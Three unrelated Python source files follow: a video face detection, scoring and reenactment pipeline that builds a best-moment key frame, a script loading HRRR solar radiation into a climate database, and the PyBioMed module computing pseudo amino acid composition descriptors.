from detection_module.detector.base import Detector
from interfaces.face import Face
from interfaces.frame import Frame
from interfaces.system_config import SystemConfig
from interfaces.system_result import SystemResult
from landmark_module.base import LandmarkModel
from logger import Logger
from reenactment_module.base import ReenactmentModel
from smile_module.base import SmileModel
from tracking_module.base import TrackingModel
from utils.common import mkdir
from utils.face import compute_eye_score, COMPARE_SCORE_WEIGHTS
class SystemWrapper:
def __init__(self, config: SystemConfig,
tracking_model: TrackingModel,
detection_model: Detector,
appearance_model: AppearanceModel,
smile_model: SmileModel,
landmark_model: LandmarkModel,
reenactment_model: ReenactmentModel
):
self.config = config
self._tracking_model = tracking_model
self._detection_model = detection_model
self._appearance_model = appearance_model
self._smile_model = smile_model
self._landmark_model = landmark_model
self._reenactment_model = reenactment_model
@staticmethod
def _compute_compare_score(face_score: float, similarity_score: float) -> float:
w_face_score, w_similarity_score = \
COMPARE_SCORE_WEIGHTS['face_score'], COMPARE_SCORE_WEIGHTS['similarity_score']
compare_score = (
w_face_score * face_score + w_similarity_score * similarity_score
) / (w_face_score + w_similarity_score)
return compare_score
@staticmethod
def _get_best_face(face_ref: Face, list_faces: List[Face]) -> Face:
if face_ref.facial_landmarks is None:
max_index = np.argmax([face.face_score for face in list_faces])
return list_faces[max_index]
face_ref_mask = np.zeros(face_ref.frame_size)
cv2.fillConvexPoly(face_ref_mask, cv2.convexHull(face_ref.facial_landmarks), 255)
best_face_info = face_ref
best_compare_score = SystemWrapper._compute_compare_score(face_score=best_face_info.face_score,
similarity_score=1.0)
for face_info in list_faces:
if face_info.facial_landmarks is None:
continue
face_info_mask = np.zeros(face_info.frame_size)
cv2.fillConvexPoly(face_info_mask, cv2.convexHull(face_info.facial_landmarks), 255)
# Compute similarity between face reference and other faces
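            # Dice coefficient over the two convex-hull masks: 2 * |A ∩ B| / (|A| + |B|)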
dice_similarity_score = np.sum(face_ref_mask[face_info_mask == 255]) * 2.0 / (np.sum(face_ref_mask) +
np.sum(face_info_mask))
compare_score = SystemWrapper._compute_compare_score(face_score=face_info.face_score,
similarity_score=dice_similarity_score)
            if compare_score > best_compare_score:
                best_compare_score = compare_score
                best_face_info = face_info
return best_face_info
def _compute_scores(self, frame_info: Frame, tracked_faces: List[Face], dict_faces_info: Dict) -> None:
frame_info.faces = tracked_faces
for face_info in tracked_faces:
face_info.frame_id = frame_info.id
face_info.frame_size = frame_info.img_size
# Assign value to dict
dict_faces_info[str(face_info.id)] = dict_faces_info.get(str(face_info.id), []) + [face_info]
# 1. Get bounding box information -> Convert to rectangle
x_min, y_min, x_max, y_max = face_info.bbox.to_rect()
# 2. Add margin to bounding box
margin = self.config.margin
x_min = np.maximum(x_min - margin, 0)
y_min = np.maximum(y_min - margin, 0)
x_max = np.minimum(x_max + margin, frame_info.img_size[1])
y_max = np.minimum(y_max + margin, frame_info.img_size[0])
rect = np.array([x_min, y_min, x_max, y_max], dtype=np.int32) # New rectangle
# 3. Crop face
cropped_face = frame_info.img[rect[1]:rect[3], rect[0]:rect[2], :]
cropped_face_copy = cropped_face.copy()
face_info.face_img = cropped_face
# 4. Compute appearance score
eye_visible, appearance_score = self._appearance_model.compute_score(cropped_face=cropped_face_copy)
# 5. Detect 68 facial landmark => if eye_visible, compute eye score
landmarks = self._landmark_model.detect(face_info=face_info, frame=frame_info.img)
eye_score = compute_eye_score(landmarks, self.config.ear_threshold)
# 6. Compute smile score
smile_score = self._smile_model.compute_score(cropped_face=cropped_face_copy)
face_info.facial_landmarks = landmarks
face_info.appearance_score = appearance_score
face_info.eye_score = eye_score
face_info.smile_score = smile_score
face_info.compute_face_score()
# 7. Add to frame score
frame_info.total_score += face_info.face_score
def get_result(self, video_path) -> SystemResult:
np.random.seed(0)
start_time = time.time()
dir_name = time.strftime('%Y_%m_%d_%H_%M', time.localtime(start_time))
inference_dir = os.path.join(self.config.inference_root_path, dir_name)
mkdir(inference_dir)
video_name = Path(video_path).stem
logger = Logger(log_file_root_path=inference_dir, log_name=video_name, module_name='MOT')
video_reader = VideoReader(video_path, ctx=cpu(0))
total_frames = len(video_reader)
# Log info
logger.info("Detection module name: {}".format(self._detection_model.name))
logger.info("Tracking module name: {}".format(self._tracking_model.name))
logger.info("Appearance module name: {}".format(self._appearance_model.name))
logger.info("Smile module name: {}".format(self._smile_model.name))
logger.info("Landmark module name: {}".format(self._landmark_model.name))
logger.info("Reenactment module name: {}".format(self._reenactment_model.name))
logger.info("Total {} frames:".format(total_frames))
# Extract all information
counter = 0
best_frame_info = None
list_frames_info = []
dict_faces_info = dict()
while counter < total_frames:
img = video_reader[counter].asnumpy()
if counter % self.config.frame_interval != 0:
counter += 1
continue
# Init frame info
frame_info = Frame(frame_id=counter, img=img)
logger.info("Frame {}:".format(counter))
# 1. Detect face
detection_start_time = time.time()
faces: List[Face] = self._detection_model.detect_face(frame=img)
logger.info("Detect {} face(s) cost time: {}s".format(len(faces),
round(time.time() - detection_start_time, 3)))
# 2. Track face
tracking_start_time = time.time()
tracked_faces: List[Face] = self._tracking_model.update(list_faces=faces, img_size=frame_info.img_size,
predict_num=self.config.frame_interval)
logger.info("Track face(s) cost time: {}s".format(round(time.time() - tracking_start_time), 3))
# 3. Compute face scores and frame score
score_computation_time = time.time()
self._compute_scores(frame_info=frame_info, tracked_faces=tracked_faces, dict_faces_info=dict_faces_info)
logger.info("Compute face score(s) cost time: {}s".format(round(time.time() - score_computation_time), 3))
# 4. Check whether it should be best frame
if best_frame_info is None or frame_info.total_score > best_frame_info.total_score:
best_frame_info = frame_info
list_frames_info.append(frame_info)
counter += 1
# Face reenactment
logger.info("Key frame at frame id: {}".format(best_frame_info.id))
result = SystemResult()
result.key_frame = best_frame_info.img
rendered_img = best_frame_info.img.copy()
reenactment_time = time.time()
for face_info in best_frame_info.faces:
# Pick the best moment frame for that face
best_face_info: Face = self._get_best_face(face_ref=face_info,
list_faces=dict_faces_info.get(str(face_info.id)))
source_img = list_frames_info[best_face_info.frame_id].img
is_rendered, rendered_img = self._reenactment_model.modify(source=best_face_info,
target=face_info,
source_img=source_img,
target_img=rendered_img)
if not is_rendered:
continue
# Get face was rendered
x_min, y_min, x_max, y_max = face_info.bbox.to_rect().astype(np.int32)
rendered_face = rendered_img[y_min: y_max, x_min: x_max]
# Draw landmarks
source_landmarks = source_img.copy()
target_landmarks = best_frame_info.img.copy()
for pt in best_face_info.facial_landmarks:
cv2.circle(source_landmarks, (pt[0], pt[1]), 2, (0, 0, 255), -1)
for pt in face_info.facial_landmarks:
cv2.circle(target_landmarks, (pt[0], pt[1]), 2, (0, 0, 255), -1)
target_landmarks = target_landmarks[y_min: y_max, x_min: x_max]
x_min, y_min, x_max, y_max = best_face_info.bbox.to_rect().astype(np.int32)
source_landmarks = source_landmarks[y_min: y_max, x_min: x_max]
# Write result
result.source_faces[str(face_info.id)] = best_face_info.face_img
result.target_faces[str(face_info.id)] = face_info.face_img
result.source_landmarks[str(face_info.id)] = source_landmarks
result.target_landmarks[str(face_info.id)] = target_landmarks
result.rendered_faces[str(face_info.id)] = rendered_face
# Final image
result.result_img = rendered_img
logger.info("Reenactment cost time: {}s".format(round(time.time() - reenactment_time), 3))
# Save result
cv2.imwrite(os.path.join(inference_dir, 'key_frame.png'), cv2.cvtColor(result.key_frame, cv2.COLOR_BGR2RGB))
cv2.imwrite(os.path.join(inference_dir, 'result.png'), cv2.cvtColor(result.result_img, cv2.COLOR_BGR2RGB))
for face_id in result.rendered_faces:
face_dir = os.path.join(inference_dir, face_id)
mkdir(face_dir)
cv2.imwrite(os.path.join(face_dir, 'source.png'),
cv2.cvtColor(result.source_faces[face_id], cv2.COLOR_BGR2RGB))
cv2.imwrite(os.path.join(face_dir, 'target.png'),
cv2.cvtColor(result.target_faces[face_id], cv2.COLOR_BGR2RGB))
cv2.imwrite(os.path.join(face_dir, 'source_landmarks.png'),
cv2.cvtColor(result.source_landmarks[face_id], cv2.COLOR_BGR2RGB))
cv2.imwrite(os.path.join(face_dir, 'target_landmarks.png'),
cv2.cvtColor(result.target_landmarks[face_id], cv2.COLOR_BGR2RGB))
cv2.imwrite(os.path.join(face_dir, 'rendered.png'),
cv2.cvtColor(result.rendered_faces[face_id], cv2.COLOR_BGR2RGB))
logger.info("Total cost time: {}s".format(round(time.time() - start_time), 3))
self._tracking_model.reset()
return result
|
"""Extract HRRR radiation data for storage with COOP data.
Run once at 10 PM to snag calendar day stations. (RUN_50_AFTER.sh)
Run again with RUN_NOON.sh when the regular estimator runs
"""
from __future__ import print_function
import datetime
import os
import sys
import pytz
import pyproj
import numpy as np
import pygrib
from pyiem.util import get_dbconn, utc
P4326 = pyproj.Proj(init="epsg:4326")
LCC = pyproj.Proj(("+lon_0=-97.5 +y_0=0.0 +R=6367470. +proj=lcc +x_0=0.0"
" +units=m +lat_2=38.5 +lat_1=38.5 +lat_0=38.5"))
SWITCH_DATE = utc(2014, 10, 10, 20)
def run(ts):
"""Process data for this timestamp"""
pgconn = get_dbconn('coop')
cursor = pgconn.cursor()
cursor2 = pgconn.cursor()
total = None
xaxis = None
yaxis = None
for hr in range(5, 23): # Only need 5 AM to 10 PM for solar
utcts = ts.replace(hour=hr).astimezone(pytz.UTC)
fn = utcts.strftime(("/mesonet/ARCHIVE/data/%Y/%m/%d/model/hrrr/%H/"
"hrrr.t%Hz.3kmf00.grib2"))
if not os.path.isfile(fn):
continue
grbs = pygrib.open(fn)
try:
if utcts >= SWITCH_DATE:
grb = grbs.select(name='Downward short-wave radiation flux')
else:
grb = grbs.select(parameterNumber=192)
except ValueError:
# Don't complain about 10 PM file, which may not be complete yet
if utcts.hour not in [3, 4]:
print('hrrr_solarrad.py %s had no solar rad' % (fn,))
continue
if not grb:
            print('Could not find SWDOWN in HRRR %s' % (fn,))
continue
g = grb[0]
if total is None:
total = g.values
lat1 = g['latitudeOfFirstGridPointInDegrees']
lon1 = g['longitudeOfFirstGridPointInDegrees']
llcrnrx, llcrnry = LCC(lon1, lat1)
nx = g['Nx']
ny = g['Ny']
dx = g['DxInMetres']
dy = g['DyInMetres']
xaxis = llcrnrx+dx*np.arange(nx)
yaxis = llcrnry+dy*np.arange(ny)
else:
total += g.values
if total is None:
print(('hrrr_solarrad.py found no HRRR data for %s'
) % (ts.strftime("%d %b %Y"), ))
return
# Total is the sum of the hourly values
# We want MJ day-1 m-2
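    # Each hourly value is treated as the mean flux (W m-2) for that hour, so
    # multiplying by 3600 s gives J m-2 and dividing by 1e6 yields MJ m-2 for the day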
total = (total * 3600.0) / 1000000.0
cursor.execute("""
SELECT station, ST_x(geom), ST_y(geom), temp24_hour from
alldata a JOIN stations t on
(a.station = t.id) where day = %s and network ~* 'CLIMATE'
""", (ts.strftime("%Y-%m-%d"), ))
for row in cursor:
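        # Project the station's lon/lat onto the HRRR LCC grid and locate the
        # enclosing grid cell with np.digitize on the x/y axes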
(x, y) = LCC(row[1], row[2])
i = np.digitize([x], xaxis)[0]
j = np.digitize([y], yaxis)[0]
rad_mj = float(total[j, i])
if rad_mj < 0:
print('WHOA! Negative RAD: %.2f, station: %s' % (rad_mj, row[0]))
continue
# if our station is 12z, then this day's data goes into 'tomorrow'
# if our station is not, then this day is today
date2 = ts.strftime("%Y-%m-%d")
if row[3] in range(4, 13):
date2 = (ts + datetime.timedelta(days=1)).strftime("%Y-%m-%d")
cursor2.execute("""
UPDATE alldata_""" + row[0][:2] + """ SET hrrr_srad = %s WHERE
day = %s and station = %s
""", (rad_mj, date2, row[0]))
cursor.close()
cursor2.close()
pgconn.commit()
pgconn.close()
def main(argv):
""" Do Something"""
if len(argv) == 4:
sts = utc(int(argv[1]), int(argv[2]), int(argv[3]), 12, 0)
sts = sts.astimezone(pytz.timezone("America/Chicago"))
run(sts)
elif len(argv) == 3:
# Run for a given month!
sts = utc(int(argv[1]), int(argv[2]), 1, 12, 0)
# run for last date of previous month as well
sts = sts.astimezone(pytz.timezone("America/Chicago"))
sts = sts - datetime.timedelta(days=1)
ets = sts + datetime.timedelta(days=45)
ets = ets.replace(day=1)
now = sts
while now < ets:
run(now)
now += datetime.timedelta(days=1)
else:
print("ERROR: call with hrrr_solarrad.py <YYYY> <mm> <dd>")
if __name__ == '__main__':
    # run main()
main(sys.argv)
|
# -*- coding: utf-8 -*-
# Copyright (c) 2016-2017, Zhijiang Yao, Jie Dong and Dongsheng Cao
# All rights reserved.
# This file is part of the PyBioMed.
# The contents are covered by the terms of the BSD license
# which is included in the file license.txt, found at the root
# of the PyBioMed source tree.
"""
#########################################################################################
Instead of using the conventional 20-D amino acid composition to represent the sample
of a protein, Prof. Kuo-Chen Chou proposed the pseudo amino acid (PseAA) composition
in order to include the sequence-order information. Based on the concept of Chou's
pseudo amino acid composition, the server PseAA was designed in a flexible way, allowing
users to generate various kinds of pseudo amino acid composition for a given protein
sequence by selecting different parameters and their combinations. This module aims at
computing two types of PseAA descriptors: Type I and Type II.
You can freely use and distribute it. If you have any problems, please contact us.
References:
[1]: Kuo-Chen Chou. Prediction of Protein Cellular Attributes Using Pseudo-Amino Acid
Composition. PROTEINS: Structure, Function, and Genetics, 2001, 43: 246-255.
[2]: http://www.csbio.sjtu.edu.cn/bioinf/PseAAC/
[3]: http://www.csbio.sjtu.edu.cn/bioinf/PseAAC/type2.htm
[4]: Kuo-Chen Chou. Using amphiphilic pseudo amino acid composition to predict enzyme
subfamily classes. Bioinformatics, 2005,21,10-19.
Authors: Zhijiang Yao and Dongsheng Cao.
Date: 2016.06.04
Email: gadsby@163.com
#########################################################################################
"""
# Core Library modules
import math
import string
# import scipy
AALetter = [
"A",
"R",
"N",
"D",
"C",
"E",
"Q",
"G",
"H",
"I",
"L",
"K",
"M",
"F",
"P",
"S",
"T",
"W",
"Y",
"V",
]
_Hydrophobicity = {
"A": 0.62,
"R": -2.53,
"N": -0.78,
"D": -0.90,
"C": 0.29,
"Q": -0.85,
"E": -0.74,
"G": 0.48,
"H": -0.40,
"I": 1.38,
"L": 1.06,
"K": -1.50,
"M": 0.64,
"F": 1.19,
"P": 0.12,
"S": -0.18,
"T": -0.05,
"W": 0.81,
"Y": 0.26,
"V": 1.08,
}
_hydrophilicity = {
"A": -0.5,
"R": 3.0,
"N": 0.2,
"D": 3.0,
"C": -1.0,
"Q": 0.2,
"E": 3.0,
"G": 0.0,
"H": -0.5,
"I": -1.8,
"L": -1.8,
"K": 3.0,
"M": -1.3,
"F": -2.5,
"P": 0.0,
"S": 0.3,
"T": -0.4,
"W": -3.4,
"Y": -2.3,
"V": -1.5,
}
_residuemass = {
"A": 15.0,
"R": 101.0,
"N": 58.0,
"D": 59.0,
"C": 47.0,
"Q": 72.0,
"E": 73.0,
"G": 1.000,
"H": 82.0,
"I": 57.0,
"L": 57.0,
"K": 73.0,
"M": 75.0,
"F": 91.0,
"P": 42.0,
"S": 31.0,
"T": 45.0,
"W": 130.0,
"Y": 107.0,
"V": 43.0,
}
_pK1 = {
"A": 2.35,
"C": 1.71,
"D": 1.88,
"E": 2.19,
"F": 2.58,
"G": 2.34,
"H": 1.78,
"I": 2.32,
"K": 2.20,
"L": 2.36,
"M": 2.28,
"N": 2.18,
"P": 1.99,
"Q": 2.17,
"R": 2.18,
"S": 2.21,
"T": 2.15,
"V": 2.29,
"W": 2.38,
"Y": 2.20,
}
_pK2 = {
"A": 9.87,
"C": 10.78,
"D": 9.60,
"E": 9.67,
"F": 9.24,
"G": 9.60,
"H": 8.97,
"I": 9.76,
"K": 8.90,
"L": 9.60,
"M": 9.21,
"N": 9.09,
"P": 10.6,
"Q": 9.13,
"R": 9.09,
"S": 9.15,
"T": 9.12,
"V": 9.74,
"W": 9.39,
"Y": 9.11,
}
_pI = {
"A": 6.11,
"C": 5.02,
"D": 2.98,
"E": 3.08,
"F": 5.91,
"G": 6.06,
"H": 7.64,
"I": 6.04,
"K": 9.47,
"L": 6.04,
"M": 5.74,
"N": 10.76,
"P": 6.30,
"Q": 5.65,
"R": 10.76,
"S": 5.68,
"T": 5.60,
"V": 6.02,
"W": 5.88,
"Y": 5.63,
}
#############################################################################################
def _mean(listvalue):
"""
########################################################################################
The mean value of the list data.
Usage:
result=_mean(listvalue)
########################################################################################
"""
return sum(listvalue) / len(listvalue)
##############################################################################################
def _std(listvalue, ddof=1):
"""
########################################################################################
The standard deviation of the list data.
Usage:
result=_std(listvalue)
########################################################################################
"""
mean = _mean(listvalue)
temp = [math.pow(i - mean, 2) for i in listvalue]
res = math.sqrt(sum(temp) / (len(listvalue) - ddof))
return res
##############################################################################################
def NormalizeEachAAP(AAP):
"""
########################################################################################
All of the amino acid indices are centralized and
standardized before the calculation.
Usage:
result=NormalizeEachAAP(AAP)
Input: AAP is a dict form containing the properties of 20 amino acids.
Output: result is the a dict form containing the normalized properties
of 20 amino acids.
########################################################################################
"""
if len(AAP.values()) != 20:
print("You can not input the correct number of properities of Amino acids!")
else:
Result = {}
for i, j in AAP.items():
Result[i] = (j - _mean(AAP.values())) / _std(AAP.values(), ddof=0)
return Result
#############################################################################################
#############################################################################################
##################################Type I descriptors#########################################
####################### Pseudo-Amino Acid Composition descriptors############################
#############################################################################################
#############################################################################################
def _GetCorrelationFunction(
Ri="S", Rj="D", AAP=[_Hydrophobicity, _hydrophilicity, _residuemass]
):
"""
########################################################################################
Computing the correlation between two given amino acids using the above three
properties.
Usage:
result=_GetCorrelationFunction(Ri,Rj)
Input: Ri and Rj are the amino acids, respectively.
Output: result is the correlation value between two amino acids.
########################################################################################
"""
Hydrophobicity = NormalizeEachAAP(AAP[0])
hydrophilicity = NormalizeEachAAP(AAP[1])
residuemass = NormalizeEachAAP(AAP[2])
theta1 = math.pow(Hydrophobicity[Ri] - Hydrophobicity[Rj], 2)
theta2 = math.pow(hydrophilicity[Ri] - hydrophilicity[Rj], 2)
theta3 = math.pow(residuemass[Ri] - residuemass[Rj], 2)
theta = round((theta1 + theta2 + theta3) / 3.0, 3)
return theta
#############################################################################################
def _GetSequenceOrderCorrelationFactor(ProteinSequence, k=1):
"""
########################################################################################
Computing the Sequence order correlation factor with gap equal to k based on
[_Hydrophobicity,_hydrophilicity,_residuemass].
Usage:
result=_GetSequenceOrderCorrelationFactor(protein,k)
Input: protein is a pure protein sequence.
k is the gap.
Output: result is the correlation factor value with the gap equal to k.
########################################################################################
"""
LengthSequence = len(ProteinSequence)
res = []
for i in range(LengthSequence - k):
AA1 = ProteinSequence[i]
AA2 = ProteinSequence[i + k]
res.append(_GetCorrelationFunction(AA1, AA2))
result = round(sum(res) / (LengthSequence - k), 3)
return result
#############################################################################################
def GetAAComposition(ProteinSequence):
"""
########################################################################################
Calculate the composition of Amino acids
for a given protein sequence.
Usage:
result=CalculateAAComposition(protein)
Input: protein is a pure protein sequence.
Output: result is a dict form containing the composition of
20 amino acids.
########################################################################################
"""
LengthSequence = len(ProteinSequence)
Result = {}
for i in AALetter:
Result[i] = round(float(ProteinSequence.count(i)) / LengthSequence * 100, 3)
return Result
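# Example (hypothetical input): GetAAComposition("ACDE") returns 25.0 for each of
# A, C, D and E and 0.0 for the remaining residues.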
#############################################################################################
def _GetPseudoAAC1(ProteinSequence, lamda=10, weight=0.05):
"""
#######################################################################################
    Computing the first 20 of type I pseudo-amino acid composition descriptors based on
[_Hydrophobicity,_hydrophilicity,_residuemass].
########################################################################################
"""
rightpart = 0.0
for i in range(lamda):
rightpart = rightpart + _GetSequenceOrderCorrelationFactor(
ProteinSequence, k=i + 1
)
AAC = GetAAComposition(ProteinSequence)
result = {}
temp = 1 + weight * rightpart
for index, i in enumerate(AALetter):
result["PAAC" + str(index + 1)] = round(AAC[i] / temp, 3)
return result
#############################################################################################
def _GetPseudoAAC2(ProteinSequence, lamda=10, weight=0.05):
"""
########################################################################################
    Computing the last lamda of type I pseudo-amino acid composition descriptors based on
[_Hydrophobicity,_hydrophilicity,_residuemass].
########################################################################################
"""
rightpart = []
for i in range(lamda):
rightpart.append(_GetSequenceOrderCorrelationFactor(ProteinSequence, k=i + 1))
result = {}
temp = 1 + weight * sum(rightpart)
for index in range(20, 20 + lamda):
result["PAAC" + str(index + 1)] = round(
weight * rightpart[index - 20] / temp * 100, 3
)
return result
#############################################################################################
def _GetPseudoAAC(ProteinSequence, lamda=10, weight=0.05):
"""
#######################################################################################
    Computing all of type I pseudo-amino acid composition descriptors based on three given
    properties. Note that the number of PAAC strongly depends on the lamda value. If lamda
= 20, we can obtain 20+20=40 PAAC descriptors. The size of these values depends on the
choice of lamda and weight simultaneously.
AAP=[_Hydrophobicity,_hydrophilicity,_residuemass]
Usage:
    result=_GetPseudoAAC(protein,lamda,weight)
Input: protein is a pure protein sequence.
lamda factor reflects the rank of correlation and is a non-Negative integer, such as 15.
Note that (1)lamda should NOT be larger than the length of input protein sequence;
(2) lamda must be non-Negative integer, such as 0, 1, 2, ...; (3) when lamda =0, the
output of PseAA server is the 20-D amino acid composition.
weight factor is designed for the users to put weight on the additional PseAA components
with respect to the conventional AA components. The user can select any value within the
region from 0.05 to 0.7 for the weight factor.
Output: result is a dict form containing calculated 20+lamda PAAC descriptors.
########################################################################################
"""
res = {}
res.update(_GetPseudoAAC1(ProteinSequence, lamda=lamda, weight=weight))
res.update(_GetPseudoAAC2(ProteinSequence, lamda=lamda, weight=weight))
return res
#############################################################################################
##################################Type II descriptors########################################
###############Amphiphilic Pseudo-Amino Acid Composition descriptors#########################
#############################################################################################
#############################################################################################
def _GetCorrelationFunctionForAPAAC(
Ri="S", Rj="D", AAP=[_Hydrophobicity, _hydrophilicity]
):
"""
########################################################################################
Computing the correlation between two given amino acids using the above two
properties for APAAC (type II PseAAC).
Usage:
result=_GetCorrelationFunctionForAPAAC(Ri,Rj)
Input: Ri and Rj are the amino acids, respectively.
Output: result is the correlation value between two amino acids.
########################################################################################
"""
Hydrophobicity = NormalizeEachAAP(AAP[0])
hydrophilicity = NormalizeEachAAP(AAP[1])
theta1 = round(Hydrophobicity[Ri] * Hydrophobicity[Rj], 3)
theta2 = round(hydrophilicity[Ri] * hydrophilicity[Rj], 3)
return theta1, theta2
#############################################################################################
def GetSequenceOrderCorrelationFactorForAPAAC(ProteinSequence, k=1):
"""
########################################################################################
Computing the Sequence order correlation factor with gap equal to k based on
[_Hydrophobicity,_hydrophilicity] for APAAC (type II PseAAC) .
Usage:
result=GetSequenceOrderCorrelationFactorForAPAAC(protein,k)
Input: protein is a pure protein sequence.
k is the gap.
Output: result is the correlation factor value with the gap equal to k.
########################################################################################
"""
LengthSequence = len(ProteinSequence)
resHydrophobicity = []
reshydrophilicity = []
for i in range(LengthSequence - k):
AA1 = ProteinSequence[i]
AA2 = ProteinSequence[i + k]
temp = _GetCorrelationFunctionForAPAAC(AA1, AA2)
resHydrophobicity.append(temp[0])
reshydrophilicity.append(temp[1])
result = []
result.append(round(sum(resHydrophobicity) / (LengthSequence - k), 3))
result.append(round(sum(reshydrophilicity) / (LengthSequence - k), 3))
return result
#############################################################################################
def GetAPseudoAAC1(ProteinSequence, lamda=30, weight=0.5):
"""
########################################################################################
    Computing the first 20 of type II pseudo-amino acid composition descriptors based on
[_Hydrophobicity,_hydrophilicity].
########################################################################################
"""
rightpart = 0.0
for i in range(lamda):
rightpart = rightpart + sum(
GetSequenceOrderCorrelationFactorForAPAAC(ProteinSequence, k=i + 1)
)
AAC = GetAAComposition(ProteinSequence)
result = {}
temp = 1 + weight * rightpart
for index, i in enumerate(AALetter):
result["APAAC" + str(index + 1)] = round(AAC[i] / temp, 3)
return result
#############################################################################################
def GetAPseudoAAC2(ProteinSequence, lamda=30, weight=0.5):
"""
#######################################################################################
    Computing the last lamda of type II pseudo-amino acid composition descriptors based on
[_Hydrophobicity,_hydrophilicity].
#######################################################################################
"""
rightpart = []
for i in range(lamda):
temp = GetSequenceOrderCorrelationFactorForAPAAC(ProteinSequence, k=i + 1)
rightpart.append(temp[0])
rightpart.append(temp[1])
result = {}
temp = 1 + weight * sum(rightpart)
for index in range(20, 20 + 2 * lamda):
result["PAAC" + str(index + 1)] = round(
weight * rightpart[index - 20] / temp * 100, 3
)
return result
#############################################################################################
def GetAPseudoAAC(ProteinSequence, lamda=30, weight=0.5):
"""
#######################################################################################
    Computing all of type II pseudo-amino acid composition descriptors based on the given
    properties. Note that the number of APAAC descriptors strongly depends on the lamda value. If lamda
    = 20, we can obtain 20+2*20=60 APAAC descriptors. The size of these values depends on the
choice of lamda and weight simultaneously.
Usage:
result=GetAPseudoAAC(protein,lamda,weight)
Input: protein is a pure protein sequence.
lamda factor reflects the rank of correlation and is a non-Negative integer, such as 15.
Note that (1)lamda should NOT be larger than the length of input protein sequence;
(2) lamda must be non-Negative integer, such as 0, 1, 2, ...; (3) when lamda =0, the
output of PseAA server is the 20-D amino acid composition.
weight factor is designed for the users to put weight on the additional PseAA components
with respect to the conventional AA components. The user can select any value within the
region from 0.05 to 0.7 for the weight factor.
    Output: result is a dict form containing the calculated 20+2*lamda APAAC descriptors.
#######################################################################################
"""
res = {}
res.update(GetAPseudoAAC1(ProteinSequence, lamda=lamda, weight=weight))
res.update(GetAPseudoAAC2(ProteinSequence, lamda=lamda, weight=weight))
return res
#############################################################################################
#############################################################################################
##################################Type I descriptors#########################################
####################### Pseudo-Amino Acid Composition descriptors############################
#############################based on different properties###################################
#############################################################################################
#############################################################################################
def GetCorrelationFunction(Ri="S", Rj="D", AAP=[]):
"""
########################################################################################
Computing the correlation between two given amino acids using the given
properties.
Usage:
result=GetCorrelationFunction(Ri,Rj,AAP)
Input: Ri and Rj are the amino acids, respectively.
AAP is a list form containing the properties, each of which is a dict form.
Output: result is the correlation value between two amino acids.
########################################################################################
"""
NumAAP = len(AAP)
theta = 0.0
for i in range(NumAAP):
temp = NormalizeEachAAP(AAP[i])
theta = theta + math.pow(temp[Ri] - temp[Rj], 2)
result = round(theta / NumAAP, 3)
return result
#############################################################################################
def GetSequenceOrderCorrelationFactor(ProteinSequence, k=1, AAP=[]):
"""
########################################################################################
Computing the Sequence order correlation factor with gap equal to k based on
    the given properties.
Usage:
result=GetSequenceOrderCorrelationFactor(protein,k,AAP)
Input: protein is a pure protein sequence.
k is the gap.
AAP is a list form containing the properties, each of which is a dict form.
Output: result is the correlation factor value with the gap equal to k.
########################################################################################
"""
LengthSequence = len(ProteinSequence)
res = []
for i in range(LengthSequence - k):
AA1 = ProteinSequence[i]
AA2 = ProteinSequence[i + k]
res.append(GetCorrelationFunction(AA1, AA2, AAP))
result = round(sum(res) / (LengthSequence - k), 3)
return result
#############################################################################################
def GetPseudoAAC1(ProteinSequence, lamda=30, weight=0.05, AAP=[]):
"""
#######################################################################################
    Computing the first 20 of type I pseudo-amino acid composition descriptors based on the given
properties.
########################################################################################
"""
rightpart = 0.0
for i in range(lamda):
rightpart = rightpart + GetSequenceOrderCorrelationFactor(
ProteinSequence, i + 1, AAP
)
AAC = GetAAComposition(ProteinSequence)
result = {}
temp = 1 + weight * rightpart
for index, i in enumerate(AALetter):
result["PAAC" + str(index + 1)] = round(AAC[i] / temp, 3)
return result
#############################################################################################
def GetPseudoAAC2(ProteinSequence, lamda=30, weight=0.05, AAP=[]):
"""
#######################################################################################
    Computing the last lamda of type I pseudo-amino acid composition descriptors based on the given
properties.
########################################################################################
"""
rightpart = []
for i in range(lamda):
rightpart.append(GetSequenceOrderCorrelationFactor(ProteinSequence, i + 1, AAP))
result = {}
temp = 1 + weight * sum(rightpart)
for index in range(20, 20 + lamda):
result["PAAC" + str(index + 1)] = round(
weight * rightpart[index - 20] / temp * 100, 3
)
return result
#############################################################################################
def GetPseudoAAC(ProteinSequence, lamda=30, weight=0.05, AAP=[]):
"""
#######################################################################################
    Computing all of type I pseudo-amino acid composition descriptors based on the given
    properties. Note that the number of PAAC strongly depends on the lamda value. If lamda
= 20, we can obtain 20+20=40 PAAC descriptors. The size of these values depends on the
choice of lamda and weight simultaneously. You must specify some properties into AAP.
Usage:
result=GetPseudoAAC(protein,lamda,weight)
Input: protein is a pure protein sequence.
lamda factor reflects the rank of correlation and is a non-Negative integer, such as 15.
Note that (1)lamda should NOT be larger than the length of input protein sequence;
(2) lamda must be non-Negative integer, such as 0, 1, 2, ...; (3) when lamda =0, the
output of PseAA server is the 20-D amino acid composition.
weight factor is designed for the users to put weight on the additional PseAA components
with respect to the conventional AA components. The user can select any value within the
region from 0.05 to 0.7 for the weight factor.
AAP is a list form containing the properties, each of which is a dict form.
Output: result is a dict form containing calculated 20+lamda PAAC descriptors.
########################################################################################
"""
res = {}
res.update(GetPseudoAAC1(ProteinSequence, lamda, weight, AAP))
res.update(GetPseudoAAC2(ProteinSequence, lamda, weight, AAP))
return res
#############################################################################################
if __name__ == "__main__":
import string
protein = "MTDRARLRLHDTAAGVVRDFVPLRPGHVSIYLCGATVQGLPHIGHVRSGVAFDILRRWLL\
ARGYDVAFIRNVTDIEDKILAKAAAAGRPWWEWAATHERAFTAAYDALDVLPPSAEPRAT\
GHITQMIEMIERLIQAGHAYTGGGDVYFDVLSYPEYGQLSGHKIDDVHQGEGVAAGKRDQ\
RDFTLWKGEKPGEPSWPTPWGRGRPGWHLECSAMARSYLGPEFDIHCGGMDLVFPHHENE\
IAQSRAAGDGFARYWLHNGWVTMGGEKMSKSLGNVLSMPAMLQRVRPAELRYYLGSAHYR\
SMLEFSETAMQDAVKAYVGLEDFLHRVRTRVGAVCPGDPTPRFAEALDDDLSVPIALAEI\
HHVRAEGNRALDAGDHDGALRSASAIRAMMGILGCDPLDQRWESRDETSAALAAVDVLVQ\
AELQNREKAREQRNWALADEIRGRLKRAGIEVTDTADGPQWSLLGGDTK"
    protein = protein.strip()
# temp=_GetCorrelationFunction('S','D')
# print temp
#
# print _GetSequenceOrderCorrelationFactor(protein,k=4)
#
# PAAC1=_GetPseudoAAC1(protein,lamda=4)
# for i in PAAC1:
# print i, PAAC1[i]
